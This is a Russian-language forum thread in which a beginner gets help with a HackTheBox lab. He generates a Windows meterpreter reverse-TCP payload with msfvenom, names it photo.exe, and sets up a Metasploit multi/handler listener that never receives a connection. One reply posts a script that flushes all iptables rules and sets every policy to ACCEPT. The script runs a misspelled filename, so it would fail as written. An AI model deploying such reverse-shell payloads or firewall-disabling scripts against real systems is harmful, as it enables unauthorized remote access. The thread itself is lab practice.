• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

проблема с metasploit exploit/multi/handler

squadron

New member
31.07.2021
4
0
Доброго времени суток, форумчане. Я столкнулся с проблемой, при пинтесте машины Love на платформе HackTheBox. Суть в том, что мне нужно получить удаленный доступ, через полезную нагрузку и metasploit. Вот как я это делал:
Bash:
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=[myip] -f exe -o photo.exe
- это я создавал саму полезную нагрузку. После того, как я загрузил ее на атакуемую машину, я запустил слушатель:

Код:
msf6 > use multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on [my_ip]:1234
и после этого, я уже запустил на атакуемой машине саму полезную нагрузку, но, у меня также бесконечная загрузка. Запускал я разными способами, и я уверен, что проблема не в том, что я его не запустил(

Заранее спасибо!
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.

а как проверить, не блокирует ли фаер на моём хосте? я новичок, поэтому пока что не очень разбираюсь
 
● nftables.service - nftables
Loaded: loaded (/lib/systemd/system/nftables.service; disabled; vendor pre>
Active: inactive (dead)
Docs: man:nft(8)



вроде выключен

Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
 
Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
спасибо, но так как мой фаервол не активен, то в чем тогда может быть проблема?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD